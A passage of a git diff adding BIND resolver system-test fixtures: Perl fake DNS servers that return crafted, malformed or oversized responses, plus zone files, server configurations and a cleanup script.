Net::DNS::RR("ns.example.net 300 A 10.53.0.3")); + } elsif ($qname eq "ns.example.net") { + $packet->push("answer", new Net::DNS::RR($qname . " 300 A 10.53.0.3")); + } elsif ($qname eq "nodata.example.net") { + # Do not add a SOA RRset. + } elsif ($qname eq "nxdomain.example.net") { + # Do not add a SOA RRset. + $packet->header->rcode(NXDOMAIN); + } elsif ($qname eq "www.example.net") { + # Data for address/alias filtering. + if ($qtype eq "A") { + $packet->push("answer", new Net::DNS::RR($qname . " 300 A 192.0.2.1")); + } elsif ($qtype eq "AAAA") { + $packet->push("answer", new Net::DNS::RR($qname . " 300 AAAA 2001:db8:beef::1")); + } + } elsif ($qname eq "badcname.example.net") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 CNAME badcname.example.org")); + } elsif (($qname eq "baddname.example.net" || $qname eq "gooddname.example.net") && $qtype eq "NS") { + $packet->push("authority", new Net::DNS::RR("example.net IN SOA (1 2 3 4 5)")) + } elsif ($qname eq "foo.baddname.example.net") { + $packet->push("answer", + new Net::DNS::RR("baddname.example.net" . + " 300 DNAME baddname.example.org")); + } elsif ($qname eq "foo.gooddname.example.net") { + $packet->push("answer", + new Net::DNS::RR("gooddname.example.net" . + " 300 DNAME gooddname.example.org")); + } elsif ($qname eq "goodcname.example.net") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 CNAME goodcname.example.org")); + } elsif ($qname =~ /^nodata\.example\.net$/i) { + $packet->header->aa(1); + } elsif ($qname =~ /^nxdomain\.example\.net$/i) { + $packet->header->aa(1); + $packet->header->rcode(NXDOMAIN); + } elsif ($qname eq "large-referral.example.net") { + for (my $i = 1; $i < 1000; $i++) { + $packet->push("authority", new Net::DNS::RR("large-referral.example.net 300 NS ns" . $i . ".fake.redirect.com")); + } + # No glue records + } elsif ($qname eq "foo.bar.sub.tld1") { + $packet->push("answer", new Net::DNS::RR("$qname 300 TXT baz")); + } elsif ($qname eq "cname.sub.example.org") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 CNAME ok.sub.example.org")); + } elsif ($qname eq "ok.sub.example.org") { + $packet->push("answer", + new Net::DNS::RR($qname . " 300 A 192.0.2.1")); + } elsif ($qname eq "www.dname.sub.example.org") { + $packet->push("answer", + new Net::DNS::RR("dname.sub.example.org" . + " 300 DNAME ok.sub.example.org")); + } elsif ($qname eq "www.ok.sub.example.org") { + $packet->push("answer", + new Net::DNS::RR($qname . " 300 A 192.0.2.1")); + } elsif ($qname eq "foo.glue-in-answer.example.org") { + $packet->push("answer", new Net::DNS::RR($qname . " 300 A 192.0.2.1")); + } elsif ($qname eq "ns.example.net") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 A 10.53.0.3")); + } else { + $packet->push("answer", new Net::DNS::RR("www.example.com 300 A 1.2.3.4")); + } + + print "RESPONSE:\n"; + $packet->print; + + return $packet->data; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($tcpsock), 1) = 1; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($udpsock), 1)) { + printf "UDP request\n"; + my $buf; + $udpsock->recv($buf, 512); + my $result = handleQuery($buf); + my $num_chars = $udpsock->send($result); + print " Sent $num_chars bytes via UDP\n"; + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $conn = $tcpsock->accept; + my $buf; + for (;;) { + my $lenbuf; + my $n = $conn->sysread($lenbuf, 2); + last unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + last unless $n == $len; + print "TCP request\n"; + my $result = handleQuery($buf); + $len = length($result); + $conn->syswrite(pack("n", $len), 2); + $n = $conn->syswrite($result, $len); + print " Sent: $n chars via TCP\n"; + } + $conn->close; + } +} diff --git a/bin/tests/system/resolver/ans8/ans.pl b/bin/tests/system/resolver/ans8/ans.pl new file mode 100644 index 0000000..8c32915 --- /dev/null +++ b/bin/tests/system/resolver/ans8/ans.pl @@ -0,0 +1,168 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use IO::File; +use IO::Socket; +use Data::Dumper; +use Net::DNS; +use Net::DNS::Packet; +use strict; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +my $server_addr = "10.53.0.8"; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +print "listening on $server_addr:$localport.\n"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!";; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +sub handleUDP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $response = new Net::DNS::Packet($qname, $qtype, $qclass); + $response->header->qr(1); + $response->header->aa(1); + $response->header->tc(0); + $response->header->id($id); + + # Responses to queries for no-questions/NS and ns.no-questions/A are + # _not_ malformed or truncated. + if ($qname eq "no-questions" && $qtype eq "NS") { + $response->push("answer", new Net::DNS::RR($qname . " 300 NS ns.no-questions")); + $response->push("additional", new Net::DNS::RR("ns.no-questions. 300 A 10.53.0.8")); + return $response->data; + } elsif ($qname eq "ns.no-questions") { + $response->push("answer", new Net::DNS::RR($qname . " 300 A 10.53.0.8")) + if ($qtype eq "A"); + return $response->data; + } elsif ($qname =~ /\.formerr-to-all$/) { + $response->header->rcode("FORMERR"); + return $response->data; + } + + # don't use Net::DNS to construct the header only reply as early + # versions just get it completely wrong. + + if ($qname eq "truncated.no-questions") { + # QR, AA, TC + return (pack("nnnnnn", $id, 0x8600, 0, 0, 0, 0)); + } + # QR, AA + return (pack("nnnnnn", $id, 0x8400, 0, 0, 0, 0)); +} + +sub handleTCP { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my @results = (); + my $response = new Net::DNS::Packet($qname, $qtype, $qclass); + + $response->header->qr(1); + $response->header->aa(1); + $response->header->id($id); + + $response->push("answer", new Net::DNS::RR("$qname 300 A 1.2.3.4")); + push(@results, $response->data); + + return \@results; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($tcpsock), 1) = 1; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($udpsock), 1)) { + printf "UDP request\n"; + my $buf; + $udpsock->recv($buf, 512); + my $result = handleUDP($buf); + my $num_chars = $udpsock->send($result); + print " Sent $num_chars bytes via UDP\n"; + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $conn = $tcpsock->accept; + my $buf; + for (;;) { + my $lenbuf; + my $n = $conn->sysread($lenbuf, 2); + last unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + last unless $n == $len; + print "TCP request\n"; + my $result = handleTCP($buf); + foreach my $response (@$result) { + $len = length($response); + $n = $conn->syswrite(pack("n", $len), 2); + $n = $conn->syswrite($response, $len); + print " Sent: $n chars via TCP\n"; + } + } + $conn->close; + } +} diff --git a/bin/tests/system/resolver/clean.sh b/bin/tests/system/resolver/clean.sh new file mode 100644 index 0000000..06d74fc --- /dev/null +++ b/bin/tests/system/resolver/clean.sh @@ -0,0 +1,39 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after resolver tests. +# +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f */ans.run +rm -f */*.jdb +rm -f dig.out dig.out.* dig.*.out.* +rm -f dig.*.foo.* +rm -f dig.*.bar.* +rm -f dig.*.prime.* +rm -f ns4/tld.db +rm -f ns6/K* +rm -f ns6/example.net.db.signed ns6/example.net.db +rm -f ns6/ds.example.net.db.signed ns6/ds.example.net.db +rm -f ns6/dsset-ds.example.net* +rm -f ns6/dsset-example.net* ns6/example.net.db.signed.jnl +rm -f ns6/named.stats* +rm -f ns6/to-be-removed.tld.db ns6/to-be-removed.tld.db.jnl +rm -f ns7/server.db ns7/server.db.jnl +rm -f resolve.out.*.test* +rm -f .digrc +rm -f ns*/named.lock +rm -f ns5/trusted.conf +rm -f ns*/managed-keys.bind* ns*/*.mkeys* diff --git a/bin/tests/system/resolver/ns1/chaostest.db b/bin/tests/system/resolver/ns1/chaostest.db new file mode 100644 index 0000000..153f31d --- /dev/null +++ b/bin/tests/system/resolver/ns1/chaostest.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ CHAOS SOA @ @ 1970010100 86400 600 86400 300 +@ CHAOS NS @ +version CHAOS TXT "CH 1.0" +hostname CHAOS TXT "unknown" diff --git a/bin/tests/system/resolver/ns1/named.conf.in b/bin/tests/system/resolver/ns1/named.conf.in new file mode 100644 index 0000000..7ca1caf --- /dev/null +++ b/bin/tests/system/resolver/ns1/named.conf.in @@ -0,0 +1,79 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1 dscp 1; + notify-source 10.53.0.1 dscp 2; + transfer-source 10.53.0.1 dscp 3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + deny-answer-addresses { 192.0.2.0/24; 2001:db8:beef::/48; } + except-from { "example.org"; }; + deny-answer-aliases { "example.org"; } + except-from { "goodcname.example.net"; + "gooddname.example.net"; }; + allow-query {!10.53.0.8; any; }; + max-zone-ttl unlimited; + attach-cache "globalcache"; +}; + +server 10.53.0.3 { + tcp-only yes; +}; + +server 10.42.23.3/32 { + notify-source 10.42.22.1; + query-source address 10.42.22.1 port 0; + transfer-source 10.42.22.1; +}; + +server fd92:7065:b8e:ffff::1000 { + notify-source-v6 fd92:7065:b8e:ffff::1001; + query-source-v6 address fd92:7065:b8e:ffff::1001 port 0; + transfer-source-v6 fd92:7065:b8e:ffff::1001; +}; + +/* + * Must be first view so that there is a CH cache with name + * "globalcache" before the recursive "default"/IN view is configured. + */ +view "class" chaos { + zone "chaostest" CHAOS { + type primary; + file "chaostest.db"; + }; +}; + +/* + * Must be second view so that so that we can check we don't attach to the + * "globalcache"/CH cache. + */ +view "default" { + zone "." { + type hint; + file "root.hint"; + }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm @DEFAULT_HMAC@; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/resolver/ns1/root.hint b/bin/tests/system/resolver/ns1/root.hint new file mode 100644 index 0000000..993227d --- /dev/null +++ b/bin/tests/system/resolver/ns1/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.2 diff --git a/bin/tests/system/resolver/ns4/broken.db b/bin/tests/system/resolver/ns4/broken.db new file mode 100644 index 0000000..eb64f85 --- /dev/null +++ b/bin/tests/system/resolver/ns4/broken.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.tld. +ns A 10.53.0.4 +$TTL 5 +sub.broken. NS ns.sub.broken. +ns.sub.broken. A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns4/child.server.db b/bin/tests/system/resolver/ns4/child.server.db new file mode 100644 index 0000000..188eb4a --- /dev/null +++ b/bin/tests/system/resolver/ns4/child.server.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns +ns A 10.53.0.4 +foo TXT "From NS 4" +bar TXT "From NS 4" diff --git a/bin/tests/system/resolver/ns4/moves.db b/bin/tests/system/resolver/ns4/moves.db new file mode 100644 index 0000000..dc1c396 --- /dev/null +++ b/bin/tests/system/resolver/ns4/moves.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.server. +foo TXT "From NS 4" +bar TXT "From NS 4" diff --git a/bin/tests/system/resolver/ns4/named.conf.in b/bin/tests/system/resolver/ns4/named.conf.in new file mode 100644 index 0000000..74a4066 --- /dev/null +++ b/bin/tests/system/resolver/ns4/named.conf.in @@ -0,0 +1,72 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +options { + query-source address 10.53.0.4 dscp 4; + notify-source 10.53.0.4 dscp 5; + transfer-source 10.53.0.4 dscp 6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + /* test that named loads with root-delegation-only */ + root-delegation-only; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "moves" { + type primary; + file "moves.db"; +}; + +zone "child.server" { + type primary; + file "child.server.db"; +}; + +zone "tld" { + type primary; + file "tld.db"; +}; + +zone "broken" { + type primary; + file "broken.db"; +}; + +zone "sourcens" { + type primary; + file "sourcens.db"; +}; + +zone "v4only.net" { + type primary; + file "v4only.net.db"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/resolver/ns4/named.noaa b/bin/tests/system/resolver/ns4/named.noaa new file mode 100644 index 0000000..be78cc2 --- /dev/null +++ b/bin/tests/system/resolver/ns4/named.noaa @@ -0,0 +1,12 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +Add -T noaa. diff --git a/bin/tests/system/resolver/ns4/root.db b/bin/tests/system/resolver/ns4/root.db new file mode 100644 index 0000000..71d90e3 --- /dev/null +++ b/bin/tests/system/resolver/ns4/root.db @@ -0,0 +1,34 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA marka.isc.org. a.root.servers.nil. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.4 +all-cnames NS cname.tld +delegation-only. NS ns.delegation-only. +ns.delegation-only. A 10.53.0.6 +example.net. NS ns.example.net. +ns.example.net. A 10.53.0.6 +no-questions. NS ns.no-questions. +ns.no-questions. A 10.53.0.8 +formerr-to-all. NS ns.formerr-to-all. +ns.formerr-to-all. A 10.53.0.8 +sourcens. NS ns.sourcens. +ns.sourcens. A 10.53.0.4 +targetns. NS ns.targetns. +ns.targetns. A 10.53.0.6 diff --git a/bin/tests/system/resolver/ns4/sourcens.db b/bin/tests/system/resolver/ns4/sourcens.db new file mode 100644 index 0000000..3567cfb --- /dev/null +++ b/bin/tests/system/resolver/ns4/sourcens.db @@ -0,0 +1,91 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This zone contains a set of delegations with varying numbers of NS +; records. This is used to check that BIND is limiting the number of +; NS records it follows when resolving a delegation. It tests all +; numbers of NS records up to twice the number followed. + +$TTL 60 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns +ns A 10.53.0.4 + +target1 NS ns.fake11.targetns. + +target2 NS ns.fake21.targetns. + NS ns.fake22.targetns. + +target3 NS ns.fake31.targetns. + NS ns.fake32.targetns. + NS ns.fake33.targetns. + +target4 NS ns.fake41.targetns. + NS ns.fake42.targetns. + NS ns.fake43.targetns. + NS ns.fake44.targetns. + +target5 NS ns.fake51.targetns. + NS ns.fake52.targetns. + NS ns.fake53.targetns. + NS ns.fake54.targetns. + NS ns.fake55.targetns. + +target6 NS ns.fake61.targetns. + NS ns.fake62.targetns. + NS ns.fake63.targetns. + NS ns.fake64.targetns. + NS ns.fake65.targetns. + NS ns.fake66.targetns. + +target7 NS ns.fake71.targetns. + NS ns.fake72.targetns. + NS ns.fake73.targetns. + NS ns.fake74.targetns. + NS ns.fake75.targetns. + NS ns.fake76.targetns. + NS ns.fake77.targetns. + +target8 NS ns.fake81.targetns. + NS ns.fake82.targetns. + NS ns.fake83.targetns. + NS ns.fake84.targetns. + NS ns.fake85.targetns. + NS ns.fake86.targetns. + NS ns.fake87.targetns. + NS ns.fake88.targetns. + +target9 NS ns.fake91.targetns. + NS ns.fake92.targetns. + NS ns.fake93.targetns. + NS ns.fake94.targetns. + NS ns.fake95.targetns. + NS ns.fake96.targetns. + NS ns.fake97.targetns. + NS ns.fake98.targetns. + NS ns.fake99.targetns. + +target10 NS ns.fake101.targetns. + NS ns.fake102.targetns. + NS ns.fake103.targetns. + NS ns.fake104.targetns. + NS ns.fake105.targetns. + NS ns.fake106.targetns. + NS ns.fake107.targetns. + NS ns.fake108.targetns. + NS ns.fake109.targetns. + NS ns.fake1010.targetns. diff --git a/bin/tests/system/resolver/ns4/tld1.db b/bin/tests/system/resolver/ns4/tld1.db new file mode 100644 index 0000000..03d7908 --- /dev/null +++ b/bin/tests/system/resolver/ns4/tld1.db @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.tld. +ns A 10.53.0.4 +$TTL 5 +to-be-removed NS ns.to-be-removed +ns.to-be-removed A 10.53.0.6 +fetch.tld. NS ns.fetch.tld. +ns.fetch.tld. A 10.53.0.6 +no-edns-version.tld. NS ns.no-edns-version.tld. +ns.no-edns-version.tld. A 10.53.0.6 +edns-version.tld. NS ns.edns-version.tld. +ns.edns-version.tld. A 10.53.0.7 +cname CNAME ns7 +ns7 A 10.53.0.7 +mixedttl 10 A 10.0.0.1 +mixedttl 15 TXT a TXT record +mixedttl 20 AAAA 2001:db8::1 diff --git a/bin/tests/system/resolver/ns4/tld2.db b/bin/tests/system/resolver/ns4/tld2.db new file mode 100644 index 0000000..c3a96d9 --- /dev/null +++ b/bin/tests/system/resolver/ns4/tld2.db @@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.tld. +ns A 10.53.0.4 +fetch.tld. NS ns.fetch.tld. +ns.fetch.tld. A 10.53.0.6 +fetchall 10 A 1.2.3.4 +fetchall 10 AAAA ::1 +fetchall 10 TXT A short ttl +no-edns-version.tld. NS ns.no-edns-version.tld. +ns.no-edns-version.tld. A 10.53.0.6 +edns-version.tld. NS ns.edns-version.tld. +ns.edns-version.tld. A 10.53.0.7 +cname CNAME ns7 +ns7 A 10.53.0.7 +mixedttl 10 A 10.0.0.1 +mixedttl 15 TXT a TXT record +mixedttl 20 AAAA 2001:db8::1 diff --git a/bin/tests/system/resolver/ns4/v4only.net.db b/bin/tests/system/resolver/ns4/v4only.net.db new file mode 100644 index 0000000..b097f3a --- /dev/null +++ b/bin/tests/system/resolver/ns4/v4only.net.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS v4.nameserver. + A 10.0.0.1 +* CNAME @ diff --git a/bin/tests/system/resolver/ns5/child.server.db b/bin/tests/system/resolver/ns5/child.server.db new file mode 100644 index 0000000..2517b6c --- /dev/null +++ b/bin/tests/system/resolver/ns5/child.server.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns +ns A 10.53.0.5 +foo TXT "From NS 5" +bar TXT "From NS 5" diff --git a/bin/tests/system/resolver/ns5/moves.db b/bin/tests/system/resolver/ns5/moves.db new file mode 100644 index 0000000..57f4e91 --- /dev/null +++ b/bin/tests/system/resolver/ns5/moves.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA marka.isc.org. ns.server. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS ns.server. +foo TXT "From NS 5" +bar TXT "From NS 5" diff --git a/bin/tests/system/resolver/ns5/named.conf.in b/bin/tests/system/resolver/ns5/named.conf.in new file mode 100644 index 0000000..eada94c --- /dev/null +++ b/bin/tests/system/resolver/ns5/named.conf.in @@ -0,0 +1,60 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +options { + query-source address 10.53.0.5 dscp 7; + notify-source 10.53.0.5 dscp 8; + transfer-source 10.53.0.5 dscp 9; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + querylog yes; + prefetch 4 10; +}; + +server 10.53.0.7 { + edns-version 0; +}; + +zone "." { + type hint; + file "root.hint"; +}; + +zone "moves" { + type primary; + file "moves.db"; +}; + +zone "child.server" { + type primary; + file "child.server.db"; +}; + +zone "delegation-only" { + type delegation-only; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/resolver/ns5/root.hint b/bin/tests/system/resolver/ns5/root.hint new file mode 100644 index 0000000..3685f54 --- /dev/null +++ b/bin/tests/system/resolver/ns5/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.4 diff --git a/bin/tests/system/resolver/ns6/broken.db b/bin/tests/system/resolver/ns6/broken.db new file mode 100644 index 0000000..85b36bf --- /dev/null +++ b/bin/tests/system/resolver/ns6/broken.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA ns hostmaster 1 1800 900 604800 600 +@ IN NS ns +ns IN A 10.53.0.6 +ns0 IN A 10.53.0.6 +ns1 IN A 10.53.0.6 +ns2 IN A 10.53.0.6 +ns3 IN A 10.53.0.6 +ns4 IN A 10.53.0.6 +ns5 IN A 10.53.0.6 +ns6 IN A 10.53.0.6 +ns7 IN A 10.53.0.6 +ns8 IN A 